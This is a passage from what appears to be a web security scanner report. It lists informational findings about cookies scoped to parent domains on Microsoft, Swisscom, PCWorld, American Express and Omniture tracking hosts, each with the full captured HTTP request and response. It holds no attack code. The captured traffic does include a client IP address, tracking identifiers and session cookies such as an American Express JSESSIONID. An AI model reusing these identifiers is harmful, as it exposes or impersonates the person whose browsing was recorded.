Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www66
Content-Length: 0
Content-Type: text/plain


17.117. http://msdn.microsoft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msdn.microsoft.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; WT_NVR_RU=0=technet:1=:2=; MUID=B506C07761D7465D924574124E3C14DF; MC1=GUID=845eef4a7ff18745a494666b76292718&HASH=4aef&LV=20114&V=3; msdn=L=1033; ixpLightBrowser=0; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_nr=1303567265614-New; _opt_vi_DANG4OLL=2A807526-0B45-4F67-8001-CE6244FF15CF; MSID=Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/23/2011 14:01:21&Microsoft.VisitStartDate=04/23/2011 13:49:08&Microsoft.CookieId=64491e77-08ce-4e1f-9bac-3648a81416de&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=6&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0253-8586-9443-3504; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303556497823:ss=1303555133331

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /en-us/
Server: Microsoft-IIS/7.5
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:58:38 GMT
Content-Length: 124

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/en-us/">here</a>.</h2>
</body></html>

17.118. http://o.swisscom.ch/b/ss/swisscom-onelive/1/H.21/s01998541245702  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.swisscom.ch
Path:   /b/ss/swisscom-onelive/1/H.21/s01998541245702

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/swisscom-onelive/1/H.21/s01998541245702?AQB=1&ndh=1&t=24/3/2011%2013%3A50%3A1%200%20300&vmt=49EAF7F8&ce=ISO-8859-1&ns=swisscom&pageName=level0/de/privatkunden/61&g=http%3A//de.swisscom.ch/privatkunden&r=http%3A//de.swisscom.ch/&cc=CHF&ch=level0/privatkunden/61&v0=level0%3Anone&events=event1%2Cevent2%2Cevent20&h1=level0/de/privatkunden/61&v2=New&h2=level0/privatkunden/61&c3=New&v3=7%3A30PM&c4=7%3A30PM&v4=Sunday&c5=Sunday&v5=Weekend&c6=Weekend&v12=%28level0%3Anone%29%7Bhttp%3A//de.swisscom.ch/%7D&v14=de&v15=level0&c18=level0&v20=level0&c25=level0%3Anone%3Alevel0/de/privatkunden/61&c26=Swisscom%20-%20Privatkunden&c47=First%20Visit&c48=1&c49=level0&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: o.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://de.swisscom.ch/privatkunden
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1303671001738-New; undefined_s=First%20Visit; s_vnum=1306263001740%26vn%3D1; s_invisit=true; s_one_campaign=level0%3Anone; s_visit=1; CTQ=http%3A//de.swisscom.ch/privatkunden; B=level0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 18:49:51 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA3867851D3788-60000143400C74A3[CE]; Expires=Fri, 22 Apr 2016 18:49:51 GMT; Domain=.swisscom.ch; Path=/
Location: http://o.swisscom.ch/b/ss/swisscom-onelive/1/H.21/s01998541245702?AQB=1&pccr=true&vidn=26DA3867851D3788-60000143400C74A3&&ndh=1&t=24/3/2011%2013%3A50%3A1%200%20300&vmt=49EAF7F8&ce=ISO-8859-1&ns=swisscom&pageName=level0/de/privatkunden/61&g=http%3A//de.swisscom.ch/privatkunden&r=http%3A//de.swisscom.ch/&cc=CHF&ch=level0/privatkunden/61&v0=level0%3Anone&events=event1%2Cevent2%2Cevent20&h1=level0/de/privatkunden/61&v2=New&h2=level0/privatkunden/61&c3=New&v3=7%3A30PM&c4=7%3A30PM&v4=Sunday&c5=Sunday&v5=Weekend&c6=Weekend&v12=%28level0%3Anone%29%7Bhttp%3A//de.swisscom.ch/%7D&v14=de&v15=level0&c18=level0&v20=level0&c25=level0%3Anone%3Alevel0/de/privatkunden/61&c26=Swisscom%20-%20Privatkunden&c47=First%20Visit&c48=1&c49=level0&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 18:49:51 GMT
Last-Modified: Mon, 25 Apr 2011 18:49:51 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www426
Content-Length: 0
Content-Type: text/plain


17.119. http://o.swisscom.ch/b/ss/swisscom-onelive/1/H.21/s02805667424352  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.swisscom.ch
Path:   /b/ss/swisscom-onelive/1/H.21/s02805667424352

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/swisscom-onelive/1/H.21/s02805667424352?AQB=1&ndh=1&t=24/3/2011%2013%3A54%3A42%200%20300&vmt=49EAF7F8&ns=swisscom&g=about%3Ablank&cc=CHF&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A//gis2.begasoft.ch/gis/swisscomGIS.jsf&pid=about%3Ablank&oid=http%3A//gis2.begasoft.ch/gis/swisscomGIS.jsf%3Flang%3Den%26plang%3Den%26show%3Dshops%2Chotspots%2Cbuildings%2Cverkehr&ot=A&oi=82&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: o.swisscom.ch

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 18:56:52 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA393A051D2AEF-60000130C0472500[CE]; Expires=Fri, 22 Apr 2016 18:56:52 GMT; Domain=.swisscom.ch; Path=/
Location: http://o.swisscom.ch/b/ss/swisscom-onelive/1/H.21/s02805667424352?AQB=1&pccr=true&vidn=26DA393A051D2AEF-60000130C0472500&&ndh=1&t=24/3/2011%2013%3A54%3A42%200%20300&vmt=49EAF7F8&ns=swisscom&g=about%3Ablank&cc=CHF&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A//gis2.begasoft.ch/gis/swisscomGIS.jsf&pid=about%3Ablank&oid=http%3A//gis2.begasoft.ch/gis/swisscomGIS.jsf%3Flang%3Den%26plang%3Den%26show%3Dshops%2Chotspots%2Cbuildings%2Cverkehr&ot=A&oi=82&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 18:56:52 GMT
Last-Modified: Mon, 25 Apr 2011 18:56:52 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www334
Content-Length: 0
Content-Type: text/plain


17.120. http://o.swisscom.ch/b/ss/swisscomonlineshop/1/H.19.4/s0175835486735  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.swisscom.ch
Path:   /b/ss/swisscomonlineshop/1/H.19.4/s0175835486735

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/swisscomonlineshop/1/H.19.4/s0175835486735?AQB=1&ndh=1&t=24/3/2011%2013%3A54%3A42%200%20300&ce=ISO-8859-1&ns=swisscom&g=about%3Ablank&cc=CHF&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx&pid=about%3Ablank&oid=http%3A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx%3Fcat%3DOS_Festnetz%26sub&ot=A&oi=71&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: o.swisscom.ch

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 18:56:49 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA3938851D3655-4000010BE016F6DA[CE]; Expires=Fri, 22 Apr 2016 18:56:49 GMT; Domain=.swisscom.ch; Path=/
Location: http://o.swisscom.ch/b/ss/swisscomonlineshop/1/H.19.4/s0175835486735?AQB=1&pccr=true&vidn=26DA3938851D3655-4000010BE016F6DA&&ndh=1&t=24/3/2011%2013%3A54%3A42%200%20300&ce=ISO-8859-1&ns=swisscom&g=about%3Ablank&cc=CHF&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&pe=lnk_e&pev1=http%3A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx&pid=about%3Ablank&oid=http%3A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx%3Fcat%3DOS_Festnetz%26sub&ot=A&oi=71&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 18:56:49 GMT
Last-Modified: Mon, 25 Apr 2011 18:56:49 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www95
Content-Length: 0
Content-Type: text/plain


17.121. http://o.swisscom.ch/b/ss/swisscompublic/1/H.16/s08473835119511  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.swisscom.ch
Path:   /b/ss/swisscompublic/1/H.16/s08473835119511

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/swisscompublic/1/H.16/s08473835119511?[AQB]&ndh=1&t=24/3/2011%2013%3A50%3A1%200%20300&vmt=49EAF7F8&ns=swisscom&pageName=/de/privatkunden/61&g=http%3A//de.swisscom.ch/privatkunden&r=http%3A//de.swisscom.ch/&cc=CHF&events=event2&v2=/de/privatkunden/61&h2=/de/privatkunden/61&c11=7%3A30PM&v11=7%3A30PM&c12=Sunday&v12=Sunday&c13=Weekend&v13=Weekend&c15=Non%20Member%20-%20/de/privatkunden/61&c16=Non%20Author%20-%20/de/privatkunden/61&c19=New&c20=/de/privatkunden/61&v22=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: o.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://de.swisscom.ch/privatkunden
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1303671001730-New

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 18:49:50 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA3867051D1D0F-60000109003DA918[CE]; Expires=Fri, 22 Apr 2016 18:49:50 GMT; Domain=.swisscom.ch; Path=/
Location: http://o.swisscom.ch/b/ss/swisscompublic/1/H.16/s08473835119511?AQB=1&pccr=true&vidn=26DA3867051D1D0F-60000109003DA918&&ndh=1&t=24/3/2011%2013%3A50%3A1%200%20300&vmt=49EAF7F8&ns=swisscom&pageName=/de/privatkunden/61&g=http%3A//de.swisscom.ch/privatkunden&r=http%3A//de.swisscom.ch/&cc=CHF&events=event2&v2=/de/privatkunden/61&h2=/de/privatkunden/61&c11=7%3A30PM&v11=7%3A30PM&c12=Sunday&v12=Sunday&c13=Weekend&v13=Weekend&c15=Non%20Member%20-%20/de/privatkunden/61&c16=Non%20Author%20-%20/de/privatkunden/61&c19=New&c20=/de/privatkunden/61&v22=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 18:49:50 GMT
Last-Modified: Mon, 25 Apr 2011 18:49:50 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www72
Content-Length: 0
Content-Type: text/plain


17.122. http://omni.pcworld.com/b/ss/pcwmw-pcworld/1/H.20.3/s02955502904951  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omni.pcworld.com
Path:   /b/ss/pcwmw-pcworld/1/H.20.3/s02955502904951

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/pcwmw-pcworld/1/H.20.3/s02955502904951?AQB=1&ndh=1&t=24/3/2011%2014%3A44%3A42%200%20300&ns=pcworldcommunication&pageName=news%3Aconsumer%20advice%3Aarticle%3Aidentity%20theft%20monitoring%20services%20called%20%27waste%27%3A149142&g=http%3A//www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html&cc=USD&ch=news&c1=source%3Acomputerworld&v1=source%3Acomputerworld&h1=news%7Earticle%7Eidentity%20theft%20monitoring%20services%20called%20%27waste%27&c2=content%20type%3Anews&v2=content%20type%3Anews&c3=display%20type%3Aarticle&v3=display%20type%3Aarticle&h5=PCW%7ETopics%7EConsumer%20Advice&c9=category%3Apcworld%3Aconsumer%20advice&v9=category%3Apcworld%3Aconsumer%20advice&c11=published%3A30-jul-08&v11=news%3Aconsumer%20advice%3Aarticle%3Aidentity%20theft%20monitoring%20services%20called%20%27waste%27%3A149142&c12=aid%3A149142&v12=news&c14=author%3Ajaikumar%20vijayan&v14=author%3Ajaikumar%20vijayan&c15=page%3A1&v15=page%3A1&c16=Data%20Not%20Available&v16=Data%20Not%20Available&c17=Data%20Not%20Available&v17=Data%20Not%20Available&c20=Data%20Not%20Available&v20=Data%20Not%20Available&c24=login%3Anot%20logged%20in&v24=login%3Anot%20logged%20in&c25=editorial%20content&v25=editorial%20content&c37=news%3Aconsumer%20advice%3Aarticle%3Aidentity%20theft%20monitoring%20services%20called%20%27waste%27%3A149142&v37=news%3Aconsumer%20advice%3Aarticle%3Aidentity%20theft%20monitoring%20services%20called%20%27waste%27%3A149142&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: omni.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205278865.1910705707.1303674274.1303674274.1303674274.1; __utmb=205278865; __utmc=205278865; __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); pcw.last_uri=/article/149142/identity_theft_monitoring_services_called_waste.html; fsr.a=1303674281645; s_sess=%20s_cc%3Dtrue%3B

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 19:50:52 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA3F8E051D35B4-400001066004C979[CE]; Expires=Fri, 22 Apr 2016 19:50:52 GMT; Domain=.pcworld.com; Path=/
Location: http://omni.pcworld.com/b/ss/pcwmw-pcworld/1/H.20.3/s02955502904951?AQB=1&pccr=true&vidn=26DA3F8E051D35B4-400001066004C979&&ndh=1&t=24/3/2011%2014%3A44%3A42%200%20300&ns=pcworldcommunication&pageName=news%3Aconsumer%20advice%3Aarticle%3Aidentity%20theft%20monitoring%20services%20called%20%27waste%27%3A149142&g=http%3A//www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html&cc=USD&ch=news&c1=source%3Acomputerworld&v1=source%3Acomputerworld&h1=news%7Earticle%7Eidentity%20theft%20monitoring%20services%20called%20%27waste%27&c2=content%20type%3Anews&v2=content%20type%3Anews&c3=display%20type%3Aarticle&v3=display%20type%3Aarticle&h5=PCW%7ETopics%7EConsumer%20Advice&c9=category%3Apcworld%3Aconsumer%20advice&v9=category%3Apcworld%3Aconsumer%20advice&c11=published%3A30-jul-08&v11=news%3Aconsumer%20advice%3Aarticle%3Aidentity%20theft%20monitoring%20services%20called%20%27waste%27%3A149142&c12=aid%3A149142&v12=news&c14=author%3Ajaikumar%20vijayan&v14=author%3Ajaikumar%20vijayan&c15=page%3A1&v15=page%3A1&c16=Data%20Not%20Available&v16=Data%20Not%20Available&c17=Data%20Not%20Available&v17=Data%20Not%20Available&c20=Data%20Not%20Available&v20=Data%20Not%20Available&c24=login%3Anot%20logged%20in&v24=login%3Anot%20logged%20in&c25=editorial%20content&v25=editorial%20content&c37=news%3Aconsumer%20advice%3Aarticle%3Aidentity%20theft%20monitoring%20services%20called%20%27waste%27%3A149142&v37=news%3Aconsumer%20advice%3Aarticle%3Aidentity%20theft%20monitoring%20services%20called%20%27waste%27%3A149142&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 19:50:52 GMT
Last-Modified: Mon, 25 Apr 2011 19:50:52 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www51
Content-Length: 0
Content-Type: text/plain


17.123. https://online.americanexpress.com/myca/ocareg/us/action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/ocareg/us/action

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /myca/ocareg/us/action?request_type=un_Register&Face=en_US&DestPage=81294+a%3Dbc58b4f6d9f9 HTTP/1.1
Host: online.americanexpress.com
Connection: keep-alive
Referer: https://online.americanexpress.com/myca/logon/us/action?request_type=LogonHandler&Face=en_US&DestPage=81294%20a%3dbc58b4f6d9f9&Face=en_US
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1303676103708679; NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d1e045525d5f4f58455e445a4a42861c; NSC_nf3-x-vt-mphpo-c=ffffffff97a3d1e545525d5f4f58455e445a4a4299f9; sroute=957221386.58148.0000

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:53:56 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000j5aKXIpvhYDsmuOaqAi_4qD:14ia6c7a4; Path=/
Set-Cookie: MATFSI=IPCFSI::true~BBV::~; Path=/; Domain=.americanexpress.com; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Set-Cookie: NSC_nf3-x-vt-pdbsfhx0-b=ffffffff97a3d0fb45525d5f4f58455e445a4a42be8b;Version=1;path=/
Keep-Alive: timeout=15, max=88
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: sroute=655231498.58660.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 48705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...

17.124. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s08759140628390  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oraclecom/1/H.19.4/s08759140628390

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s08759140628390?AQB=1&pccr=true&&ndh=1&t=24/3/2011%2014%3A44%3A19%200%20300&ce=UTF-8&pageName=Dialogue%20Welcome%20Page%3AWWMK10058753MP%3A7054579%3A8834744%3A9&g=http%3A//www.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8834744%26src%3D7054579%26Act%3D9%26sckw%3DWWMK10058753MPP001.GCM.8100.110&r=http%3A//www.oracle.com/pls/www/go.lp%3Fkw%3D%26Src%3D7054579%26Act%3D9%26SC%3Dsckw%3DWWMK10058753MPP001.GCM.8100.110&cc=USD&ch=Landing%20Pads&events=event1%2Cevent6&v1=WWMK10058753MP%3A7054579%3A8834744%3A9&v6=WWMK10058753MPP001.GCM.8100.110&v7=WWMK10058753MPP001.GCM.8100.110%3A%20Dialogue%20Welcome%20Page%3AWWMK10058753MP%3A7054579%3A8834744%3A9&c20=New&v20=New&v26=Landing%20Pads&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp?p_ext=Y&p_dlg_id=8834744&src=7054579&Act=9&sckw=WWMK10058753MPP001.GCM.8100.110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|0-0|4DB47D87[CE]

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:46:01 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EFC8515AF33-60000180E01EF56C|4DB47D87[CE]; Expires=Fri, 22 Apr 2016 19:46:01 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|26DA3EFC8515AF33-60000180E01EF56E|4DB47D87[CE]; Expires=Fri, 22 Apr 2016 19:46:01 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 19:46:01 GMT
Last-Modified: Mon, 25 Apr 2011 19:46:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DB47DF9-5E44-2EC783FC"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www407
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

17.125. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

